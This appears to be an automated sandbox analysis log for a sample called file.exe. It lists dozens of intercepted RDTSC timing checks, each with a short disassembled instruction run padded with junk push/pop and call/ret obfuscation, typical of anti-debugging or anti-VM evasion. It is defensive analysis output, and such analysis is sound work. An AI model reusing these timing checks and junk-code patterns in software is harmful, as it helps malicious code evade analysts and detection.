Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC675 second address: ADC68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F5E792621EAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC68F second address: ADC6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5E78823258h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2A73h], ebx 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+122D34ABh], ecx 0x0000001d push 00000000h 0x0000001f cld 0x00000020 push 00000003h 0x00000022 mov edi, esi 0x00000024 call 00007F5E78823259h 0x00000029 push esi 0x0000002a pushad 0x0000002b ja 00007F5E78823256h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 pop esi 0x00000035 push eax 0x00000036 jmp 00007F5E78823261h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f jmp 00007F5E7882325Ah 0x00000044 mov eax, dword ptr [eax] 0x00000046 pushad 0x00000047 jmp 00007F5E78823260h 0x0000004c push ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC6FE second address: ADC71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E792621F3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADC71D second address: ADC740 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E78823258h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov ch, 56h 0x0000000f lea ebx, dword ptr [ebp+1244C1AFh] 0x00000015 mov edx, 51D9091Ch 0x0000001a push eax 0x0000001b pushad 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE8AD second address: AEE8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFD0F8 second address: AFD10A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E7882325Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC75D3 second address: AC75D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC75D9 second address: AC75F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F5E78823256h 0x0000000c jmp 00007F5E7882325Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC75F6 second address: AC7605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F5E792621E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC7605 second address: AC761F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823266h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC761F second address: AC762E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB248 second address: AFB268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E78823269h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB550 second address: AFB556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB6CA second address: AFB6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBEB5 second address: AFBEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBEB9 second address: AFBEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF2948 second address: AF2953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5E792621E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFCCCB second address: AFCCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F5E78823256h 0x0000000b jmp 00007F5E7882325Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0072A second address: B0072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0072E second address: B00732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00732 second address: B00744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F5E792621E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00744 second address: B00750 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E78823256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00750 second address: B0076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E792621E6h 0x00000009 jmp 00007F5E792621EEh 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0076D second address: B0078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823267h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07516 second address: B07531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F5E792621E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnp 00007F5E792621E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07531 second address: B07536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07536 second address: B07551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E792621F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07551 second address: B07580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F5E7882325Dh 0x00000013 jmp 00007F5E78823263h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C5D6 second address: B0C612 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5E792621E8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 call 00007F5E792621E9h 0x00000028 push eax 0x00000029 push edx 0x0000002a jg 00007F5E792621ECh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C612 second address: B0C63A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E78823265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E7882325Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C63A second address: B0C63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C63E second address: B0C64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C64F second address: B0C666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E792621F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C666 second address: B0C670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5E78823256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0DBFE second address: B0DC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0DC02 second address: B0DC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007F5E78823256h 0x00000010 jmp 00007F5E78823267h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0DC2A second address: B0DC2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0F70D second address: B0F711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B10253 second address: B102E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007F5E792621F5h 0x0000000e pop esi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 jne 00007F5E79262200h 0x00000018 pushad 0x00000019 mov edx, dword ptr [ebp+122D3CDDh] 0x0000001f pushad 0x00000020 jmp 00007F5E792621ECh 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F5E792621E8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3A99h] 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 jc 00007F5E792621E6h 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B102E2 second address: B102F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F5E78823256h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B102F6 second address: B102FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B11D4A second address: B11D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E78823265h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B11D63 second address: B11D81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jp 00007F5E792621E6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jbe 00007F5E792621E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1236D second address: B12371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12371 second address: B12375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12375 second address: B1241E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E7882325Bh 0x0000000b popad 0x0000000c nop 0x0000000d add edi, 0EB75FC1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F5E78823258h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f jmp 00007F5E78823263h 0x00000034 mov esi, 5D41ECE3h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F5E78823258h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push edi 0x00000056 mov esi, dword ptr [ebp+122D3AFDh] 0x0000005c pop esi 0x0000005d xchg eax, ebx 0x0000005e jg 00007F5E78823270h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push edi 0x00000069 pop edi 0x0000006a js 00007F5E78823256h 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14BF9 second address: B14BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14BFE second address: B14C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E7882325Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1966F second address: B19674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19856 second address: B19861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5E78823256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A78E second address: B1A816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F5E792621E8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a or ebx, 088591E1h 0x00000030 movsx ebx, si 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a clc 0x0000003b mov eax, dword ptr [ebp+122D0165h] 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 call 00007F5E792621E8h 0x00000049 pop ebx 0x0000004a mov dword ptr [esp+04h], ebx 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc ebx 0x00000057 push ebx 0x00000058 ret 0x00000059 pop ebx 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D3ACDh] 0x00000061 mov bh, 12h 0x00000063 push FFFFFFFFh 0x00000065 mov edi, 082D6EF0h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F5E792621E6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B86A second address: B1B86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A816 second address: B1A820 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E792621E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1C71C second address: B1C722 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A820 second address: B1A82A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E792621ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1C722 second address: B1C746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F5E78823266h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1C746 second address: B1C74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B970 second address: B1B977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D698 second address: B1D69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D69C second address: B1D71B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F5E78823258h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 sbb edi, 20AA0B49h 0x0000002c push 00000000h 0x0000002e mov di, bx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F5E78823258h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d jno 00007F5E7882325Ch 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jmp 00007F5E78823265h 0x0000005a push eax 0x0000005b push edx 0x0000005c jns 00007F5E78823256h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E670 second address: B1E6AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b mov di, 9900h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F5E792621E8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push ebx 0x0000002c or edi, dword ptr [ebp+122D3494h] 0x00000032 pop ebx 0x00000033 cmc 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D89F second address: B1D8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E6AF second address: B1E6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E6B3 second address: B1E6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E6B7 second address: B1E6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1F72F second address: B1F733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1F7E0 second address: B1F7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2288B second address: B2288F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2288F second address: B228C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F5E792621F9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E792621EEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23821 second address: B2382B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2382B second address: B238A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F5E792621E8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D2054h], edi 0x00000028 xor dword ptr [ebp+122D2A73h], edi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F5E792621E8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a jnc 00007F5E792621E9h 0x00000050 push 00000000h 0x00000052 push esi 0x00000053 push edx 0x00000054 mov edi, dword ptr [ebp+122D3B21h] 0x0000005a pop ebx 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e pushad 0x0000005f jg 00007F5E792621E6h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B258D6 second address: B258EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E7882325Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B258EB second address: B258F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E792621E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B258F9 second address: B25903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25903 second address: B25920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E792621F3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25920 second address: B25933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5E7882325Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25EDB second address: B25EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25EDF second address: B25EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
